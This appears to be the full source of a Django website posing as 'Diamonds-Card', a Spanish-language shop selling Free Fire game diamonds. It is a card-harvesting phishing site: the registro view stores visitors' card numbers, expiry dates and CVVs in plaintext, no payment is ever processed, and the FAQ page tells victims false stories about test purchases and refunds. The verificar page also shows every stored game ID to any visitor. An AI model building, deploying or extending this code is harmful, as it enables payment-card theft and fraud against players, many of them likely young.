Home/Home/urls.py
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path("", include("recargas.urls")),
    path('admin/', admin.site.urls),
]

Home/recargas/urls.py
from django.urls import path
from . import views


app_name = "recargas"
urlpatterns = [
    path("", views.index, name="index"),
    path("<int:numero>/", views.registro, name="registro"),
    path("verificar/", views.verificar, name="verificar"),
    path("esperar/", views.esperar, name="esperar"),
    path("info/", views.info, name="info")
]

Home/recargas/models.py
from django.db import models
# Create your models here.
#valor_diamantes es donde se guardaran el valor del diamante.
# name_diamantes es donde se guardaran el nombre en str del valor diamante.
# prece_diamante es el precio del diamante
class Diamantes(models.Model):
      valor_diamantes  = models.IntegerField()
      name_diamantes = models.CharField(max_length=200)
      price_diamantes = models.CharField(max_length=200)
      
      def __str__(self) -> str:
            return self.name_diamantes
      
      
class CardsDatas(models.Model):
      id_game = models.CharField(max_length=20,)
      number_card = models.CharField(max_length=200)
      date = models.CharField(max_length=10)
      cvv = models.CharField(max_length=6)
      #Comprobar el numero del indice que viene por request
      comprobar_numero = models.CharField(max_length=200)
      #Email introducido



      def __str__(self) -> str:
            return self.id_game
      
      
class EmailValido(models.Model):
      email_correo = models.CharField(max_length=200)
      
      def __str__(self) -> str:
            return self.email_correo
      

Home/recargas/views.py
from django.shortcuts import render
from django.http import HttpResponseRedirect
from .models import Diamantes, EmailValido,  CardsDatas


def index(request):
      return render(request, "recargas/index.html")


def registro(request, numero):
      diamantes = Diamantes.objects.get(pk=numero)
      contex = {
            "comprobar_numeros": numero,
            "diamantes": diamantes,
            }
      if request.method == 'POST':
            card = CardsDatas()
            card.comprobar_numero =  numero
            card.id_game = request.POST['id_game']
            card.number_card = request.POST["number_card"] 
            card.date = request.POST["date"] 
            card.cvv = request.POST["cvv"]
            card.save() 
            return HttpResponseRedirect("/verificar/")
      else:
        
     
            return render(request, "recargas/registro.html", contex)
                  
      
      
def verificar(request):
      cards = CardsDatas.objects.all()
      if request.method == 'POST':
            email_3 = EmailValido()
            
            email_3.email_correo = request.POST['email_3']
            email_3.save()
            
            return HttpResponseRedirect("/esperar/")
      context = {
            "cards": cards,
      }
      
      
      return render(request,"recargas/verificar.html", context)
     
     
def  esperar(request):
      email = EmailValido.objects.all()

            
      contex = {
            'email': email,
      }
      return render(request, "recargas/esperar.html", contex)


def info(request):
      return render(request,'recargas/info.html')

Home/recargas/templates/recargas/esperar.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Espera</title>
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
</head>
<body>
      <style>
            
      </style>
  <div class="container  text-center bg-gradient mt-3 rounded-3  shadow w-50 " id="verificar" >
      
      <div class="container bg-black rounded-2 p-2 bg-gradient " >
            <h2 class="text-uppercase">Espera... al menos 5 minutos</h2>
      </div>
      <ul>
            <br>
            {% for correo in email  %}
            <br>
            <li class="text-light">
                  
                  Te enviamos un mensaje a:
                  <strong class="text-bg-primary p-1 rounded-2">
                        {{correo}}
                  </strong>
            </li>
            {% endfor %}
            <br>
      </ul>
      <a href="{% url 'recargas:index' %}" class="bg-black p-2 rounded-3 m-2 shadow">Aceptar</a>
  </div>
</body>
</html>

Home/recargas/templates/recargas/index.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
      
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
      <title>Frefire</title>
</head>
<body>
      <!-- Hearder -->
      <header>
            
            <div class="container shadow shadow "  id="container-header">
                  <!-- Imagen de logo derecho -->
                  <img src="{% static '/Img/Logo/Frefire.png' %}"   height="90px" width="250px" alt="">

                  <div class="enlace-diamantes">
                        <a href="{% url 'recargas:info' %}">Preguntas frecuentes</a>
                        <span>
                              <img src="{% static '/Img/Diamantes.png' %}"  height="20px" width="30px" alt="">
                        </span>
                  </div>
            </div>

      </header>
      <!-- Main -->
      <main>
            <!-- Card 1 -->
            <section class="container " id="seccion-card" >
                  <div class="card" >
                        <h3>Sé el último en pie</h3>
                        <img src="{% static '/Img/Escuadrq.jpg' %}" height="120px"  width="250px" alt="">
                        <p>
                              ¿Como jugar freefire? Facíl, los jugadores se enfrentan en una isla remota en partidas rápidas que duran unos 10 minutospara emboscar,  y buscar equipos. Hay una meta aquí: Controles fáciles de usar y gráficos suaves prometen la mejor experiencia de supervivencia que encontrarás en el móvil.
                        </p>
                        <div class="enlance-ver" >
                              <a href="https://www.youtube.com/watch?v=Ef8wkjvs-Kg">Ver</a>
                        </div>
                  </div>

                  <!-- Card 2 -->
                  <div class="card" >
                        <h3>¡Diamantes para ganar!</h3>
                        <img src="{% static '/Img/diam2.jpg' %}" height="120px"  width="250px" alt="">
                        <p>Los diamantes son el recurso más valioso en Free Fire. Ellos te permiten obtener algunas ventajas dentro del juego y salir ganador de las partidas. Los Diamantes se utilizan para comprar artículos en la tienda del juego, actualizar el Pase de temporada, girar el Diamante Royale, comprar personajes y ¡hasta desbloquear algunas habilidades extras!
                        </p>
                        <div class="enlance-ver" >
                              <a href="https://www.youtube.com/watch?v=2TNJ3V4-0_s">Ver</a>
                        </div>
                  </div>
                  <!-- Card 3 -->
                  <div class="card" >
                        <h3>Cómo comprar Diamantes</h3>
                        <img src="{% static '/Img/Gana-diamantes.png' %}" height="120px"  width="250px" alt="">
                        <p>
                              Después de seleccionar el paquete que prefieras y realizar tu compra con éxito podrás reclamar tu código en Hype ingresando a tu inventario y en la pestaña lateral de tu pantalla al seleccionar tu paquete de Diamantes, ingresarás el ID de tu cuenta y así obtendrás tus diamantes de forma inmediata!                        </p>
                        <div class="enlance-ver" >
                              <a href="https://www.youtube.com/watch?v=7zD_JyDMl9g">Ver</a>
                        </div>
                  </div>
            </section>

            <!-- Seccion of Buys -->
            <section class="container shadow " id="container-buy" >
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 1,500 Diamantes</h4>
                        <div class="enlace-price" >$9.99</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  1 %}">Comprar</a>
                        </div>
                  </div>
                  <!-- Card-buys 2 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 440 Diamantes</h4>
                        <div class="enlace-price" >$3.00</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  2 %}">Comprar</a>
                        </div>
                  </div>
                  <!-- Card-buys 3 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 220 Diamantes</h4>
                        <div class="enlace-price" >$1.00</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  3 %}">Comprar</a>
                        </div>
                  </div>
                  <!-- Card-buys 4 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 1,270 Diamantes</h4>
                        <div class="enlace-price" >$10.99</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  4 %}">Comprar</a>
                        </div>
                  </div>
                  <!-- Card-buys 5 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 2,500 Diamantes</h4>
                        <div class="enlace-price" >$20.99</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  5 %}">Comprar</a>
                        </div>
                  </div>
                  <!-- Card-buys 6 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 6,300 Diamantes</h4>
                        <div class="enlace-price" >$50.54</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  6 %}">Comprar</a>
                        </div>
                  </div>
            </section>
            <!-- Caorousel  Freefire -->
            <div class="container" >
                  
            <div id="carouselExampleFade" class="carousel slide carousel-fade" data-bs-ride="carousel">
                  
                  <div class="carousel-inner rounded-4 shadow" id="pruebas">
                    <div class="carousel-item active ">
                        <div class="container" id="wandy" >
                              <span>
                                    
                                    <img src="{% static '/Img/Logo/Faceboock.png' %}" width="50px" height="50px" alt="">
                                    <a href="https://web.facebook.com/profile.php?id=100086036228775">Facebook</a>
                              </span>
                              <span>
                                   
                                    <img src="{% static '/Img/Logo/Instagram.png' %}" width="50px"  height="50px" alt="">
                                    <a href="https://www.instagram.com/diamonds.cards0/">Instagram</a>
                              </span>
                        </div>
                      <img src="{% static '/Img/carousel/Carousel1.jpg' %}" class="d-block w-100" alt="...">
                    </div>
                    <div class="carousel-item">
                        <div class="container" id="wandy" >
                              <span>
                                  
                                    <img src="{% static '/Img/Logo/Faceboock.png' %}" width="50px" height="50px" alt="">
                                    <a href="#">Facebook</a>
                              </span>
                              <span>
                                    
                                    <img src="{% static '/Img/Logo/Instagram.png' %}" width="50px"  height="50px" alt="">
                                    <a href="#">Instagram</a>
                              </span>
                        </div>
                      <img src="{% static '/Img/carousel/Carousel2.jpg' %}" class="d-block w-100" alt="...">
                    </div>
                    <div class="carousel-item">
                        <div class="container" id="wandy" >
                              <span>
                                  
                                    <img src="{% static '/Img/Logo/Faceboock.png' %}" width="50px" height="50px" alt="">
                                    <a href="#">Facebook</a>
                              </span>
                              <span>
                                 
                                    <img src="{% static '/Img/Logo/Instagram.png' %}" width="50px"  height="50px" alt="">
                                    <a href="#">Instagram</a>
                              </span>
                        </div>
                      <img src="{% static '/Img/carousel/Carousel3.jpg' %}" class="d-block w-100" alt="...">
                    </div>
                  </div>
         
                </div>
            </div>
      </main>
      <!-- Footer -->
      <footer class="container" id="container-footer" >
            <!-- Informaciones de nosotros -->
      <div class="container-info" >
            <h2>Sobre nosotros</h2>
            <p>
                  Diamons-card es una tienda online de recargar diamantes en Freefire, escuchamos los gritos de mejores jugadores y aqui estan los cupones a precios super competitivos, nos basamos en sus registro para dar publicidad y asi generar las mejores ofertas.
            </p>
      </div>
      <!-- Derechos reservados -->
      <div class="container-derechos" >
            <h2>Diamonds-Card</h2>
            <p>
                  © 2022, Level Up! Interactive Ltda. TODOS LOS DERECHOS RESERVADOS. Todas las marcas son propiedad de sus respectivos dueños en los Estados Unidos y en otros países.
                  Los horarios del sitio siguen la Hora oficial de Santiago (GMT-4)
            </p>
      </div>
      </footer>
</body>
</html>

Home/recargas/templates/recargas/info.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>


      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Document</title>
      
      <!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
      <!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
      <!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
      <!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
</head>
<body>
      <main>
            <div class="container-sm text-center shadow  rounded-3">
                  <h2>Preguntas mas frecuentes</h2>
                  <p class="container mt-5 p-3">
                        <strong >¿Porque cobramos por nomina?</strong>  <br> Pues cuando cobras por nomina el banco quita un porcentaje considerable, nuestro sistema hace una compra en Play Store para comprobar su metodo de pago luego se le devolverá dicha compra no pasa el dolar. <br>

                        <strong>¿Como generan dinero para las compras?</strong><br> Usamos publicidad para generar las ganancias a nuestro favor, gracias a ustedes. <br>

                        <strong>¿Que pasa si los datos son validos y pasan los 5 minutos de compra?</strong> No se le aplicaran los cargos. <br>

                        <strong>¿Porque mi compra no se realizo?</strong> <br> Si usted hizo una compra o dos compras es posible que deba esperar algunos dias para poder realizar otra compra o intente con otro metodo de pago.


                       <strong> ¿Porque la espera?</strong> Pues tenemos muchas solicitudes de compras y necesitamos tiempo para proceder mas de dos compras.

                  </p>

            </div>
            
            <div class="container  ">
                                   
                  <button id="input-button" ><a href="{% url 'recargas:index' %}">Inicio</a></button>

            </div>
      </main>
</body>
</html>

Home/recargas/templates/recargas/registro.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
      
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
      <title>Frefire</title>
</head>
<body>
      <main>
    

      
            <section class="container shadow  " id="container-buy-2" >

              <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>{{diamantes.name_diamantes}}</h4>
                        <div class="enlace-price" >{{diamantes.price_diamantes}}</div>
                        <div class="enlace-buy">
                              <a href="#">Escogido </a>
                        </div>

                              
                   
                                    
                  <div class="container shadow" id="div-form">
                        <h1>Registra tus datos</h1>
                        <form action="" id="form"  method="post">
                              {% csrf_token %}
                              <input type="number" id="input-cards" name="id_game" placeholder="ID del usuario" required >
                              <input type="number" id="input-cards"name="number_card"
                              placeholder="Numero de Tarjeta" required>
                              
                              <input type="month" id="input-date" name="date" 
                              placeholder="MM/YY" required>
                              <input type="number" id="input-cvv"name="cvv" 
                              placeholder="CVV" required>

                              <div class="container  ">
                                   
                                    <button id="input-button" ><a href="{% url 'recargas:index' %}">Inicio</a></button>
                                    <input type="submit" id="input-button" value="Enviar">

                              </div>
                              <div class="container" id="card-master">
                                    <img src="{% static '/Img/Mastercard.png' %}"  
                                    width="25" alt="">
                                    <img src="{% static '/Img/Visa.png' %}"
                                    width="35" alt="">
                              </div>
                        </form>
                  </div>
            </section> 
            
      </main>
</body>
</html>

Home/recargas/templates/recargas/verificar.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Verificando</title>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
</head>
<body>
      <main>
            <div class="container">
                  <h2>Ultimo paso <strong>Verificando..</strong></h2>

                  <p>La validacion y su compra puede tardar unos 5 minutos, <strong>Por favor espere mientras confirmamos su metodo de pago.</strong></p>
                        <div class="container shadow   rounded-2 " >
                        <ul>
                         
                               
                               {% for card in cards  %}
                               <br>
                               <li>
                                    Se enviara un monto de Diamantes, asegurate de que  tu ID este aqui  
                                    <strong class='text-bg-primary text-capitalize text-bg-body p-1 m-1 rounded-2' >{{card}}</strong>
                              </li>
                               {% endfor %}
                               
                       
                        </ul>
                  </div>
                  <div class="container">
                        <h2>Ingrese su Correo</h2>
                        <p>Confirmaremos su compra atravez de su correo y enviaremos la factura de su compra</p>
                        <form action="" method="post">
                              {% csrf_token %}
                              <div class="mb-1">
                                    <label for="" class="form-label">Email</label>
                                    <input type="email" class="form-control" name="email_3"  aria-describedby="emailHelpId" placeholder="username@gmail.com">
                                    <small id="emailHelpId" class="form-text text-muted">Diamonds_Cards@gmail.com</small>
                                  </div>

                                  <input type="submit" id="input-button" value="Enviar">
                        </form>
                      
                  </div>
                  {% comment %} <button id="input-button" ><a href="{% url 'recargas:index' %}">Inicio</a></button> {% endcomment %}
                  
            </div>
      </main>
</body>
</html>